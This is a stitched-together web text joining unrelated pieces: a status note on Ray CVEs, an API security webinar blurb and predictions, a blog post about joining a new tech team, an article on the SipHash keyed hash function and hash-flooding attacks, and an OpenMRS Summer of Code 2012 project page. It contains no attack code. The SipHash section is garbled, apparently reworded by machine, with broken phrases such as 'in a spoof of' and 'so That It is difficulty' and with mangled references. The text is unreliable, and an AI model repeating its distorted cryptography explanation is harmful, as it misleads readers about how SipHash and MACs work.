In summary, the status is as follows:
- 4 of the 5 reported CVEs (CVE-2023-6019, CVE-2023-6020, CVE-2023-6021, CVE-2023-48023) are fixed in the master and will be released as part of Ray 2.8.1.
- The remaining CVE (CVE-2023-48022) – that Ray does not have authentication built-in – is a long-standing design decision based on how Ray’s security boundaries are drawn.
According to their post, the 5th CVE (the lack of authentication built into Ray) has not been addressed, and that is why it is not, in their opinion, a vulnerability or a bug.
Webinar: Top Things You Need to Know About API Security
The flipside of the exponential adoption of APIs over the past decade has been the upsurge in the sheer volume of API attacks. Stories of API security breaches are everywhere which shines a harsh spotlight on the ease of API abuse and the complexities of robust API security. Join this webinar as two of the industry’s leading experts guide you through some real-world cases of API security attacks and also share some best practices for securing your APIs.
They dive into crucial vulnerabilities highlighted in the OWASP API Security Top 10, such as enforcing authorization, protecting authentication endpoints and preventing SSRF, a new entry in the 2023 version of the OWASP Top10 for APIs. They also bring the threats to life with several demos, providing a practical look at how these vulnerabilities can be exploited, but also how they can be prevented through a combination of design-time and run-time protection.
At the end of this session, you will have an actionable set of guidelines to assess and improve the security of your own APIs in the face of a number of identified threats.
Predictions for API security in 2024
Finally, I am compelled to make some predictions of my own for API security in 2024. I think API security will remain an important topic in 2024 and continue to receive significant attention at various levels. Based on what I have seen recently in the newsletter, I predict:
- We will see more so-called mega-breaches where organizations lose all of their customer or private data to API breaches or exploits (see examples here and here)
- Vendors (seemingly most often cryptocurrency portals) will continue to experience key leakage or loss (see here, here, and here for examples)
- Attackers will continue to shift their attacks toward more subtle vectors that exploit the business logic of the API rather than specific implementation flaws. A good example is the recent Twitter mass account information leakage incident, which occurred without detection over 18 months.
- I think we will see the occurrence of the first batch of API supply chain vulnerabilities where an upstream API flaw is instrumental in a breach in a downstream API, as predicted by OWASP with the new API10:2023 Unsafe Consumption of APIs.
- And finally, the role of the developer in implementing API security at design time will only continue to rise. As I alluded to over a year ago, empathy for the API developer with tools designed to secure code at design time can only help improve API security in general.
Get API Security news directly in your Inbox.
By clicking Subscribe you agree to our Data Policy
|
OPCFW_CODE
|
Tech is a special industry among industries. The workers are highly educated, wealthy, and in good health. Compare this to other times of high industry growth in the industrial revolution: workers there were low education, poor, and often paid the price of health to work long hours in harsh conditions. Finally, the most mind boggling difference: tech workers have incentive to change jobs. Thus leading into this topic: starting at new companies and on new teams.
I recently changed companies (company number 3) moving from one tech giant to a smaller but still fairly large tech company. With this comes the challenges of learning the lay of the land, the typical feats of bravery to prove yourself, and the immeasurable stress of your brain on overdrive taking in all the new names and acronyms.
For those thinking of changing teams or companies, this can be daunting or even a deal breaker if building new relationships is hard for you. Maybe you can’t bear the thought of slogging through months of not knowing exactly what you are doing or being unable to answer your boss’s questions. For those of you in the middle of this, you know how this feels and unless you’re extremely lucky, you probably have some friction with your new teammates thrown in there too. Here is my advice on getting through this more smoothly:
- Play to your strengths: If you’re like me, you’re sick of hearing this because whenever someone says it they never tell you what your strengths are. Just play to them. As if we’re born knowing what we’re good at. Seriously though, figure out what you’re good at or at least what you’re more comfortable with. Example: I’m good at writing and make really bad first impressions. This means I should focus on making a written introduction to people to soften the blow of the inevitable slap in the face my first verbal interaction with them is going to be.
- Seek to understand before being understood: I would say this goes without saying but it really needs saying. If people feel like you’re interested in the history of what they’ve worked on then they are more willing to hear your opinions on it. Don’t: We should use Slack because Microsoft Lync is crappy. Do: What are your favorite collaboration tools? I personally like Slack because of the wide variety of emoji. Maybe we could try it out sometimes on the team if there’s interest.
- Get social: But don’t because being introverted is way better. Find out how your team communicates: email, chat, IRC, in person, forums, meetings. Understand when you’re supposed to use each medium and which one each team member prefers. If your team is full of heads down coders that hate to be interrupted, respect that and set up 1:1s if you need in person time.
- Learn to fish: Asking people how to do things is sometimes the only way to learn a team’s tech stack. Documentation isn’t known to be a glamorous part of being a developer so it’s often sparse. However, try to figure out where the documentation is on your team. Do they use README files, confluence, Wikipedia, SharePoint? If you can become good at mining this information it will help you build trust through your knowledge.
- Make yourself at home: Being comfortable in your environment can reduce your stress and help you learn more effectively. Not only that, lower stress means fewer mistakes and you’ll probably be more interested in going to work day to day. What does this look like? Personally, I wear slippers at work and have a blanket at my desk in case I get cold. Making your space your own can also mentally set you up to be in work mode. I won’t go so far as a framed photo of my cats on my desk but whatever you need to make you feel like you belong there.
As always, there’s more to say on all of these topics and these are only a few things you can do to help with team integration and “ramp-up”. The thing to remember is that you can change your environment and have the power to adapt as well. Take some time to think of which you need to do for each instance of discomfort you encounter.
Have fun being the newbie.
|
OPCFW_CODE
|
SipHash is an Add-Rotate-Xor (ARX) based family of pseudorandom created by Jean-Philippe Aumasson and Daniel J. Bernstein in 2012, in a spoof of “hash flooding” denial-of-service attacks in Late 2011.
Although designed for use as a hash function in the computer science sense, SipHash is fundamentally different from cryptographic hash functions like SHM in which it is only suitable as a message authentication code : a keyed hash function like HMAC . That is, SHA is designed so That It is difficulty for an attacker to find two messages X and Y Such That SHA ( X ) = SHA ( Y ), Even Though anyone May compute SHA ( X ). SipHash instead guarantees that, having seen X i and SipHash ( X i , k ),
SipHash computes 64-bit message authentication code from a variable-length message and 128-bit secret key. It was designed to be efficient even for short inputs, with comparable performance to non-cryptographic hash functions, such as CityHash , thus can be used to prevent denial-of-service attacks against hash tables (“hash flooding” or to authenticate network packets .
An unkeyed hash function such as SHA is only collision-resistant if the entire output is used. If used to generate a small output, then no algorithm can prevent collisions; An attacker need only make as many as possible.
For example, assume a network server is designed to be able to handle up to a million requests at once. It keeps track of incoming requests in a hash table with two million entries, using a hash function to map. An attacker who knows the hash function arbitrary inputs; One out of two million will have a specific hash value. If the attacker now Sends A Few hundred requests all Chosen to avez la même hash value to the server, That will Produce a wide number of hash collisions Slowing (gold Possibly stopping) the server with an effect similar to a packet flood of Many million requests.
By using a key to the attacker, a keyed hash function like SipHash prevents this sort of attack. While it is feasible to add a key year to hash unkeyed function ( HMAC is a popular technical) SipHash is much more efficient.
Functions in SipHash family are specified as SipHash- c – d , Where c is the number of rounds per message block and d is the number of rounds finalization. The recommended parameters are SipHash-2-4 for best performance, and SipHash-4-8 for conservative security.
The reference implementation was released as public domain software under CC0 .
SipHash is used in hash table implementations of various software:
- Perl (available as compile-time option)
- Python (starting in version 3.4)
- Rust
- Systemd
- C ++
- Crypto ++
- C #
- Cryptographic hash function
- Hash function
- Message authentication code
- List of hash functions
- ^ Jump up to:a b Jean-Philippe Aumasson & Daniel J. Bernstein (2012-09-18). “SipHash: a fast short-input PRF” (PDF) .
- Jump up^ Lennon, Mike (2011-12-28). “Hash Table Vulnerability Enables Wide-Scale DDoS Attacks” . SecurityWeek .
- Jump up^ Aumasson, Jean-Philippe; Bernstein, Daniel J .; Boßlet, Martin (2012-11-08). Hash-flooding DoS reloaded: attacks and defenses (PDF) . Application Security Forum – Western Switzerland 2012 .
- Jump up^ Crosby, Scott A .; Wallach, Dan S. (2003-08-06). Denial of Service via Algorithmic Complexity Attacks . Usenix Security Symposium . Washington, DC
- Jump up^ “SipHash: a fast short-input PRF” . 2016-08-01 . Retrieved 2017-01-21 .
Intellectual property: We are not aware of any patents or patent applications related to SipHash, and we are not planning to apply for any. The reference code of SipHash is released under CC0 license, a public domain-like license.
- Jump up^ Jean-Philippe Aumasson; Daniel J. Bernstein (2016-08-01). “SipHash: a fast short-input PRF, Users” . Retrieved 2017-01-21.
- Jump up^ “Perl security – Algorithmic Complexity Attacks” . 2016-05-16 . Retrieved 2017-01-21 .
- Jump up^ Christian Heimes (2013-09-27). “PEP 456 – Secure and interchangeable hash algorithm” . Retrieved 2017-01-21 .
- Jump up^ Graydon Hoare (2012-07-24). “Add core :: hash containing SipHash-2-4 implementation. Re: # 1616 and # 859” . Retrieved 2017-01-21 .
- Jump up^ Lennart Poettering (2013-12-22). “Shared: switch to have SipHash table implementation over to” . Retrieved 2017-01-21 .
|
OPCFW_CODE
|
Blacklist Persistence
Would like a way to keep the blacklist persistent when the YouTube page is refreshed. Currently, it appears that one must manually "apply" the blacklist each time (or periodically?) upon refresh of the web page.
Hi @iodaniell,
The blacklist should be persisted upon page refresh or browser new instances. I actually never witnessed the behavior you describe...
What version are you running?
Here's the info on one the one I have installed (copied from Firefox -
Manage Extension):
Author Bamdad
https://addons.mozilla.org/en-US/firefox/user/12178173/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=addons-manager-user-profile-link
Version 1.2.17
Last Updated May 2, 2022
Homepage https://github.com/bamdadsabbagh/youtube-blacklist--extension
It's not a big deal. I just notice periodically that something that I
absolutely know is in the filter/black-list sneaks past the filter.
Thanks for your attention.
--
iodaniell
On Tue, May 17, 2022 at 2:09 AM Bamdad Sabbagh @.***>
wrote:
Hi @iodaniell https://github.com/iodaniell,
The blacklist should be persisted upon page refresh or browser new
instances. I actually never witnessed the behavior you describe...
What version are you running?
—
Reply to this email directly, view it on GitHub
https://github.com/bamdadsabbagh/youtube-blacklist--extension/issues/162#issuecomment-1128451469,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AL5KY7YZZPDK3JUYE6VZ33TVKMZ2RANCNFSM5V6A737Q
.
You are receiving this because you were mentioned.Message ID:
@.***
com>
Thanks for the information @iodaniell !
I made some tests today and did reproduce the error, very likely caused by a wrong reference between video_id and channel_id.
I need to figure out why this happens and fix it as soon as I get some free time. I will keep this issue updated.
Thanks.. I'm glad that I wasn't imagining things. I really like the
extension when it works, which it does most of the time.
Good luck on finding the bug.
On Wed, May 18, 2022 at 12:59 PM Bamdad Sabbagh @.***>
wrote:
Thanks for the information @iodaniell https://github.com/iodaniell !
I made some tests today and did reproduce the error, very likely caused by
a wrong reference between video_id and channel_id.
I need to figure out why this happens and fix it as soon as I get some
free time. I will keep this issue updated.
—
Reply to this email directly, view it on GitHub
https://github.com/bamdadsabbagh/youtube-blacklist--extension/issues/162#issuecomment-1130261088,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AL5KY73K24BN3QJTCTKWQX3VKUOXXANCNFSM5V6A737Q
.
You are receiving this because you were mentioned.Message ID:
@.***
com>
|
GITHUB_ARCHIVE
|
I wish to extract .s2p files from my HP 8722A Network Analyzer.
I could not find a driver for it. It is connected to my computer over GPIB.
I am quite new to this, so if anyone could explain the overall process to extract .s2p files from a network Analyzer, that would be much appreciated.
I imagine that one takes a measurement, stores it under a certain filename, then a command retrieves it and sends it to the computer?
Thank you so much,
Solved! Go to Solution.
Instead of extracting the .s2p files, which because of the age of the device (manual I found said 1991), could be very difficult, I think we would be better served communicating with the device directly and not using the files it creates. Instead of the process you described, we could set it to take a measurement, send the measurement to the computer, and have the computer do any manipulation/saving it may need.
This manual discusses the basics of communication over GPIB with that device in chapter 12:
GPIB communication is typically pretty simple. The computer will just send the device in question the command or series of commands then wait for the response back, much like the GPIB examples in labview (Example finder>>Hardware IO>>GPIB).
Unfortunately for us, the Agilent website here:
only has the operating and service manuals, and not the programming reference manual. You may want to contact agilent to get the programming reference manual, as that will list all of the commands you need to send the device.
Thank you for your reply.
The reason I want to get the .s2p files directly is that other people will be processing that data afterwards.
After some research, I managed to find the following programming guide which is compatible with the 8722A:
The commands used in the example programs work (I'm currently looking at p155).
I've gone through every single command in the programming reference
but I couldn't find the one command that will output the s parameters measurement.
I'm quite confused right now.
Do you know how I can output the results of a meaurement I just made?
I plan to send "s11" and then read back the results.
I tried "OUTPFORM" but I get strange, seemingly unrelevant numbers back.
Thank you very much,
Could you take the data on the machine then distribute the files in a more easy to handle format, such as a TDMS or CSV?
As for how to directly retreive the s2p files or how to use specific functions via programming, you may want to contact agilent, as they may know the device better.
I attached the VI created to build an S2P file from extracted data out of an HP8722A Network Analyzer.
Hope this comes handy to somebody one day.
|
OPCFW_CODE
|
How to write Pcap packets in FIFO using Scapy (pcapwriter)
I'm French, sorry if my english isn't perfect !
Before starting, if you want to try my code, you can download a pcap sample file here : https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=ipv4frags.pcap
I succeed to open pcap file, read packets and write them to another file with this code :
# Python 3.6
# Scapy 2.4.3
from scapy.utils import PcapReader, PcapWriter
import time
i_pcap_filepath = "inputfile.pcap" # pcap to read
o_filepath = "outputfile.pcap" # pcap to write
i_open_file = PcapReader(i_pcap_filepath) # opened file to read
o_open_file = PcapWriter(o_filepath, append=True) # opened file to write
while 1:
# I will have EOF exception but anyway
time.sleep(1) # in order to see packet
packet = i_open_file.read_packet() # read a packet in file
o_open_file.write(packet) # write it
So now I want to write in a FIFO and see the result in a live Wireshark window.
To do that, I just create a FIFO :
$ mkfifo /my/project/location/fifo.fifo
and launch Wireshark application on it : $ wireshark -k -i /my/project/location/fifo.fifo
I change my filepath in my Python script : o_filepath = "fifo.fifo" # fifo to write
But I have a crash ... Here is the traceback :
Traceback (most recent call last):
File "fifo.py", line 25, in <module>
o_open_file = PcapWriter(o_pcap_filepath, append=True)
File "/home/localuser/.local/lib/python3.6/site-packages/scapy/utils.py", line 1264, in __init__
self.f = [open, gzip.open][gz](filename, append and "ab" or "wb", gz and 9 or bufsz) # noqa: E501
OSError: [Errno 29] Illegal seek
Wireshark also give me an error ("End of file on pipe magic during open") : wireshark error
I don't understand why, and what to do. Is it not possible to write in FIFO using scapy.utils library ? How to do then ?
Thank you for your support,
Nicos44k
Night was useful because I fix my issue this morning !
I didn't undestand the traceback yesterday but it give me in reality a big hint : we have a seek problem.
Wait ... There is no seek in FIFO file !!!
So we cannot set "append" parameter to true.
I changed with : o_open_file = PcapWriter(o_filepath)
And error is gone.
However, packets were not showing in live...
To solve this problem, I needed to force FIFO flush with : o_open_file.flush()
Remember that you can download a pcap sample file here : https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=ipv4frags.pcap
So here is the full code :
# Python 3.6
# Scapy 2.4.3
from scapy.utils import PcapReader, PcapWriter
import time
i_pcap_filepath = "inputfile.pcap" # pcap to read
o_filepath = "fifo.fifo" # pcap to write
i_open_file = PcapReader(i_pcap_filepath) # opened file to read
o_open_file = PcapWriter(o_filepath) # opened file to write
while 1:
# I will have EOF exception but anyway
time.sleep(1) # in order to see packet
packet = i_open_file.read_packet() # read a packet in file
o_open_file.write(packet) # write it
o_open_file.flush() # force buffered data to be written to the file
Have a good day !
Nicos44k
|
STACK_EXCHANGE
|
I started working on my MMO today. You can’t really do anything in it yet but you can walk around. Everyone controls the same character so for the time being I suppose it’s more of a massively single player online game.
A browser based MMOMarch 6, 2012
Something else worth ignoringJuly 23, 2010
Another browser based thing I was working on but never went very far with before returning to focusing on Wii homebrew was a game called Maze Slugs. It was a top down shooter similar to They Do Not Die but obviously browser based. As the name suggested it also uses randomly generated mazes instead of pre made maps. I didn’t get very much done before growing bored with it. You can move and shoot but it has no effect on the enemies and they have no effect on you. A lot about how it was written is sloppy and just slow. Still it might be somewhat useful if you want to read an example of how to generate mazes in Java Script and it should be fairly easy to adapt that to any other language.
Something worth ignoringJuly 20, 2010
I had started a third Pineapple Apocalypse RPG game which I had decided on titling The Kludge Of Meatspace and it was going to be browser based and made using Java Script and a few HTML5 elements. I’m posting it in its horrifically incomplete state because I don’t really plan on working on it anymore. At the least not in the foreseeable future. I’ve lost some of the interest I had in browser based stuff and I’m focusing more on Wii homebrew again. But its really not worth bothering with.
It reuses the map from Revolt of the Binary Couriers. The walking animation isn’t in place. there are no NPCs. There is nothing in the environment that you can interact with. The combat system isn’t properly setup. There is no leveling. The way the game screen is scaled up (at least the way firefox handles it) make it look blurry instead of pixelated. the game doesn’t seem to work unless you refresh the page once (I think its a problem with loading the images). The way it decides your starting position based on your real world geographical position isn’t fully setup and doesn’t work properly/consistently.
its really not worth bothering with.
Slime RollMay 6, 2010
This is what resulted from me getting bored but not particularly feeling in the mood to continue with one of the other things I had already started. Another browser based thing that is so totally not a game. It doesn’t even have any interactivity.
I might come back to this at some point and make a game out of it. I’m not really sure how well a Super Monkey Ball / Mercury Meltdown type game would really work in a side view 2d environment though.
Gravity GlideMay 4, 2010
|
OPCFW_CODE
|
Chore/cleanup
This is a PR made of general cleanup. Major things were the removing the filter aliases and renaming uuid to uid.
I have another pending PR where I have done the best I can to make pixi.js an isomorphic library. There are only 2 issues with the PR.
I made the changes on top of these changes, so waiting to hear about this one.
The resource-loader is actually the biggest offender in terms of environment dependent code (at module execution time), so would still need some work to get it over the finish line.
Anyway, enough about a PR yet to be submitted, this one is hopefully straight forward.
You may notice that a lot of this work enforces the dependency separate so it will make splitting up the code base easier in the future.
I will definitely take some time to review this, thanks @drkibitz!
The resource-loader is actually the biggest offender in terms of environment dependent code (at module execution time), so would still need some work to get it over the finish line.
This is totally true, originially I was going to use superagent to keep it agnostic and work in both places. But unfortunately they dropped XDR/IE9 support so I ended up having to do it myself :(
@englercj @GoodBoyDigital I was almost going to call this "done" from double checking any more paste errors etc.. but then I wanted to fix one more thing.
I'm not a fan of publicly made aliases, as you can assume, it makes the API surface unnecessarily larger to cover, and more difficult to update (deprecations, etc.).
The last piece I wanted to address was the items within and the namespace itself of PIXI.math. For me it's totally fine to maintain and math/index module that is internal to the core, but then mix it in to core itself to make items public. It is also ok with me to not mix it in, and expose the math/index module as a namespace on core itself (like core.utils). What bothers me is doing both.
So I am will to do this work in one way or another. I would like to do one of the following:
Deprecate PIXI.math namespace, and favor the member of math mixed into PIXI
Deprecate the members that are accessible on PIXI in favor of accessing them on PIXI.math
Just let me know what you think. Personally I'm in favor of #2 since it is more in line with the direction of the rest of the 3.0 API.
@GoodBoyDigital and some others feel strongly about having math functions on the main object.
Personally I agree and think PIXI.math is the correct way to use it since that is what PIXI.utils and other modules are as well. Maybe people have changed their minds recently?
Pinging a few interested parties:
@GoodBoyDigital @photonstorm @alvinsight
Well, at first, thank you @drkibitz for this ! Pixi needed a spring-clean :)
So regarding the PIXI.math and mixing modules in, I would always prefer having the things that people use outside of PIXI (math, blend modes, etc) in the global namespace.
It's very straightforward (you want a point? then PIXI.Point, etc...) and in line with the ease of use and the level of abstraction that pixi provides.
I don't mind having the texture cache in the Utils and having the Ticker in tickers.Tickers because they are classes that people don't normally touch when they are just creating a product with pixi.
If users want to play with the internals of the library then they are obviously willing to discover how these internals work.
@englercj @alvinsight @GoodBoyDigital Since this has been sitting a couple weeks, I think I'm going to go with deprecating the math namespace.
Rebased, and added https://github.com/GoodBoyDigital/pixi.js/commit/f684a1424506af656e02d0a0320c179a5fce44be
Like I said, I was not really married to one way or another, I just didn't want both. I don't believe in maintaining synonymous members in a single API. This comes from experience maintaining internal APIs at various employers, and being a long term consumer of various open source libraries. Compatibility is fine and usually the only time I'm fine with it, just as long as it always comes with deprecation. Without that, it is just a compromise, and is just the result of not coming to a decision. Synonymous members always become troublesome to maintain long term, and ultimately lead to unnecessary confusion one way or another by consumers of the API. This all may seem like a small thing when it comes to a single method or namespace, but my hope is that it comes with a longer term contract for the future ;)
This all looks good to me, if @GoodBoyDigital is OK with it we can merge.
Looks good to me! Thanks for this one @drkibitz :+1:
Nice one @drkibitz, thank you for your efforts :)
|
GITHUB_ARCHIVE
|
ucfr - Update Configuration File Registry: associate packages with configuration files
2. SYNOPSIS ▲
ucfr [ options "] " <Package><Path to configuration file>
3. DESCRIPTION ▲
Where Packageis the package associated with the configuration file (and, in some sense, its owner), and Path to configuration fileis the full path to the location (usually under /etc) where the configuration file lives, and is potentially modified by the end user.
This script maintains an association between configuration files and packages, and is meant to help provide facilities that dpkgprovides conffiles for configuration files and not shipped in a
Debian package, but handled by the postinst by ucfinstead. This script is idempotent, associating a package to a file multiple times is not an error. It is normally an error to try to associate a file which is already associated with another package, but this can be over ridden by using the --forceoption.
4. OPTIONS ▲
Print a short usage message
Dry run. Print the actions that would be taken if the script is invoked, but take no action.
-d [n], --debug [n]
Set the debug level to the (optional) level n(n defaults to 1). This turns on copious debugging information.
Removes all vestiges of the association between the named package and the configuration file from the registry. The association must already exist; if the configuration file is associated with some other package, an error happens, unless the option --forceis also given. In that case, the any associations for the configuration file are removed from the registry, whether or not the package name matches. This action is idempotent, asking for an association to be purged multiple times does not result in an error, since attempting to remove an non-existent association is silently ignored unless the --verboseoption is used (in which case it just issues a diagnostic).
Make the script be very verbose about setting internal variables.
This option forces operations requested even if the configuration file in consideration is owned by another package. This allows a package to "hijack"a configuration file from another package, or to purge the association between the file and some other package in the registry.
Set the state directory to /path/to/dir instead of the default /var/lib/ucf.Used mostly for testing.
5. USAGE ▲
The most common case usage is pretty simple: a single line invocation in the postinst on configure, and another single line in the postrm to tell
ucfr to forget about the association with the configuration file on purge (using the --purge option) is all that is needed (assuming ucfr is still on the system).
6. FILES ▲
/var/lib/ucf/registry,and /var/lib/ucf/registry.X,where Xis a small integer, where previous versions of the registry are stored.
7. EXAMPLES ▲
If the package foowants to use ucfr to associate itself with a configuration file foo.conf,a simple invocation of ucfr in the postinst file is all that is needed:
On purge, one should tell ucf to forget about the file (see detailed examples in /usr/share/doc/examples):
8. SEE ALSO ▲
9. AUTHOR ▲
This manual page was written Manoj Srivastava <>, for the Debian GNU/Linux system.
|
OPCFW_CODE
|
Avoid high contention on Cleaner registration/cleanup
Motivation:
Netty5 buffer API is now using the JDK Cleaner tool, in order to process the phantom reachable buffers and to invoke cleaning actions (memory release and buffer leak detection).
Now, when calling the Cleaner.register() method, or Cleanable.clean() methods, the caller threads may contend on some synchronized methods, see this method which is called by Cleaner.register() as well as this method which is called when invoking Cleanable.clean() method.
So, with some scenarios, this may considerably affect performance, especially under heavy load and when Event Loop threads are allocating/dropping buffers very often (each event loop thread are waiting for each other, fighting in order to obtain the synchronized lock on the Cleaner object).
For example, using Reactor-Netty based on netty5, we have a scenario where an H2C client can send/receive around 132k of requests per seconds, but with a lot of idle CPUS (30% idle), and using the proposed patch, the rate of received response is considerably increased, up to 380k instead of 132k).
In order to reproduce the issue, I have attached a JMH reproducer scenario project. On my machine with 10 cpus, and with jdk19, I'm getting the following results, with around 68% of idle CPUs:
Benchmark Mode Cnt Score Error Units
AllocationBenchmark.testAllocate thrpt 4 2995.474 ± 94.552 ops/ms
and using the proposed patch, I'm then getting the following with only 1,32% of idle CPU:
Benchmark Mode Cnt Score Error Units
AllocationBenchmark.testAllocate thrpt 4 50095.795 ± 1377.148 ops/ms
Modification:
The InternalBufferUtils.CLEANER singleton is not used anymore and has been replaced by the new CleanerPool class which maintains a pool of cleaners that are mapped to each Event Loops (using FastThreadLocal).
By default, the number of Cleaner instances maintained by the CleanerPool corresponds to the number of available processors, but you can take control on the number of cleaners allocated by the pool, using this system property:
-Dio.netty5.cleanerpool.size=<number> (0 by default, meaning the number of available processors are used as the number of created Cleaners)
It may be frightening to create many Cleaners because there is a daemon thread that is created for each Cleaner instance, but using multiple Cleaners almost eliminate the EventLoop thread contention on the Cleaner register/unregister.
Also, on a bug free system, without any memory leaks, then the daemon threads are normally staying idle and won't be waken up by phantom references.
In addition to this, in case java19+ is used, the CleanerPool can optionally use Loom virtual ThreadFactory for Cleaner daemon threads. The virtual ThreadFactory are instantiated using MethodHandles in order to avoid locking to Loom API.
If you are using java19+, you can configure this system property:
-Dio.netty5.cleanerpool.vthread=true (false by default)
This will allow to configure the Cleaners with virtual threads, something like (but using Method Handles):
Cleaner cleaner = Cleaner.create(Threads.ofVirtual().factory())
Honestly, I did the test using Cleaners + Virtual Threads, but the results are similar, even a bit slower.
I think maybe it's because synchronized is still pinning the carrier thread (maybe ...).
That's why the io.netty5.cleanerpool.vthread is set to false by default. But it may be useful to have all in place in order to be able to switch to vthreads in case they fix the synchronized issue.
Result:
The proposed patch reduces and almost eliminates the contention between event loops and the Cleaner, at the cost of allocating more Cleaner instances, but this is normally not a problem for systems which don't have any memory leaks , because the Cleaner daemon threads should sday idle in this case. And optionally, all is in place in order to use Loom virtual threads as Cleaner daemons (if java19+ is used).
@chrisvest was this related to the issue on macOS we talked about in the past ?
/cc @nitsanw
also @ivankrylov
@pderop
Just thinking loud, but. in order to save any contention to happen in the common/happy path, wouldn't be better to have a fast-thread-local shared-nothing cleaner and a shared (fixed sized) pool available for non-event-loop threads instead?
The latter can use a similar mechanism of the existing PR: if users would use external thread pools, makes sense they'll pay some contention to happen (and they have some config param to make things better, really); but I won't expect event loop confined cleaners to ever interact each-others/with other threads, wdyt?
@franz1981 ,
Indeed, it seems nice and simpler to just map a dedicated/not-shared cleaner to each event loop thread; this is actually what we want. And for other external threads, we would use a shared and fixed cleaner pool (similar to this current PR).
Now, in reactor netty, we may have some scenarios where a buffer can be closed by an event loop that is different from the one that created it, so yes, we may have some interactions between different event loops, but the contention will be reduced since now we have multiple cleaners.
So, I'll try to update the PR based on your suggestion, thanks !
ok, then I'll remove the loom stuff in few moment, no worries.
@pderop thanks a lot!
@normanmaurer , @chrisvest , @franz1981 , @nitsanw , @turbanoff , @gtixfr ,
glad to see this PR merged ! thanks to everyone for the great reviews ! :tada:
|
GITHUB_ARCHIVE
|
CMake How to make project export header files before dependent project build
There are 2 projects in proj1/ and proj2/. proj1 is a library, and proj2 is an executable which uses proj1.
The dir tree is like:
repo/
include/
proj1/
hello.h
hello.cpp
proj2/
testApp.cpp // it #include hello.h
CMake will make proj1 then proj2. I want CMake to copy hello.h to include/ when it builds proj1, if the file is not updated, so that proj2 build will succeed.
Currently I only know to use install():
install(FILES hello.h DESTINATION $ENV{REPO_ROOT_DIR}/include)
However, this only export file when make install. It doesn't happen in the normal sequence of build tasks.
Have you tried target_include_directories on the target of proj2? It seems that there's a confusion between configuration/building and the install step.
@compor How do I use target_include_directories to achieve this goal? I know target_include_directories but I understand it is to add include dirs for target, like proj2, not to copy files
you don't need to copy header files to use them in a project; just point the compiler to the right directory.
Never write to the source tree during the build.
CMake is supposed to be used for out-of-source builds, so I should be able to build even if the source is located on a read-only filesystem.
As was pointed out in the comments, in the simple case where the header is already present and not changed by the build of proj1, you can just target_include_directories its folder into proj2 and be done.
If that is, for whatever reason, not applicable and you really need to copy the file to a different place, you should copy it to a folder under the PROJECT_BINARY_DIR and then target_include_directories to that. Depending on what information you need to have available for copying the file, you can either perform the copying at CMake configure time (using eg.
configure_file) or at build time, using add_custom_command. In the latter case you need to make sure that you model your dependencies accordingly, so that proj2 is not allowed to build before the file has been copied.
Does it mean in CMake, there is no need to export public header files to a top-level include/ like before? How do I use target_include_directories here? Should I say: target_include_directories(proj2 PUBLIC ../proj1) ?
@Sheen why don't you try it? what's the worst thing that can happen? Also, what do you mean "like before"?
@Sheen You should always prefer passing absolute paths to CMake commands. So it should be something like target_include_directories(proj2 PUBLIC ${PROJECT_SOURCE_DIR}/proj1). It is okay to add include directories outside your immediate directory, but you should refrain from adding non-system include directories outside of the source tree (like, doing a ${PROJECT_SOURCE_DIR}/../foo to go above the root of your project source).
@ComicSansMS It works now. But what if my proj2 needs to #include 20 projects' header files? Do I add 20 target_include_directories() ? In my current practise, e.g. makefile, no CMake, all the projects' public header files are copied to a top include/ dir.
@Sheen That's how it's supposed to work, yes. Keep in mind that CMake has to support all kinds of different compiler toolchains, each coming with their different constraints. As a result, specific tasks are often more cumbersome than with your favorite toolchain, but that's the price you pay for a portable build.
@ComicSansMS I think I understand what you mean, but it is still not convincing to me. Major toolchains all support pre-build / post-build events. It is not harmful to provide the option.
@Sheen CMake supports pre- and post-build events through add_custom_command. That doesn't take care of setting any include paths for compilation though.
@ComicSansMS I just spotted this command actually. It is what I am looking for. Include path can be set at beginning at top level.
|
STACK_EXCHANGE
|
Web Page: http://go.openmrs.org/soc2012
Mailing List: https://wiki.openmrs.org/display/RES/Mailing+Lists
Write Code. Save Lives. Join OpenMRS for Google Summer of Code 2012.
Thank you for your interest in OpenMRS! OpenMRS has been accepted for the 6th year as a mentoring organization for Google Summer of Code in 2012. We're enjoyed participating in this great program in the last 5 years and are even more excited about the projects and mentors we have available this year. Coding for OpenMRS is a great way to practice your coding skills and, at the same time, help benefit people in developing countries who are on the front lines of the battle against HIV/AIDS, TB, and Malaria.
The Summer of Code page on our wiki describes potential projects and our mentors this year. These aren't "busy work" - we've reviewed our actual project list and identified ones that can be completed by students (advised by our team of excellent mentors) during Summer of Code this year.
Our world continues to be ravaged by a pandemic of epic proportions, as over 40 million people are infected with or dying from HIV/AIDS - most (up to 95%) are in developing countries. Prevention and treatment of HIV/AIDS on this scale requires efficient information management, which is critical as HIV/AIDS care must increasingly be entrusted to less skilled providers. Whether for lack of time, developers, or money, most HIV/AIDS programs in developing countries manage their information with simple spreadsheets or small, poorly designed databases ... if anything at all. To help them, we need to find a way not only to improve management tools, but also to reduce unnecessary, duplicative efforts.
As a response to these challenges, OpenMRS formed in 2004 as a open source medical record system framework for developing countries - a tide which rises all ships. OpenMRS is a multi-institution, nonprofit collaborative led by Regenstrief Institute, a world-renowned leader in medical informatics research, and Partners In Health, a Boston-based philanthropic organization with a focus on improving the lives of underprivileged people worldwide through health care service and advocacy. These teams nurture a growing worldwide network of individuals and organizations all focused on creating medical record systems and a corresponding implementation network to allow system development self reliance within resource constrained environments. To date, OpenMRS has been implemented in several developing countries, including South Africa, Kenya, Rwanda, Lesotho, Uganda, Tanzania, Haiti, Mozambique, Sierra Leone, and many more. This work is supported in part by organizations such as the World Health Organization (WHO), the Centers for Disease Control (CDC), the Rockefeller Foundation, the International Development Research Centre (IDRC) and the US President's Emergency Plan for AIDS Relief (PEPFAR).
Read more about OpenMRS at OpenMRS.org.
- Anatomical Drawing Custom Datatype (Design Page) This goal of this project is to create a custom data type in Complex Obs just like how we have ImageHandler. When this handler is rendered at the UI it would open up an editor which can help the physician draw different parts of the body , annotate it with remarks , upload the image of patient , etc
- Better Error Submission Process for FDBK Module Better Error Submission Process for FDBK Module is an extension of the project General Feedback Mechanism. The main objective of the Feedback module is to provide a mechanism for users to communicate with system supporters/admins with system-related (not patient-specific) messages, refactoring the error submission process and make it more easy and effective preferably a wizard driven one.
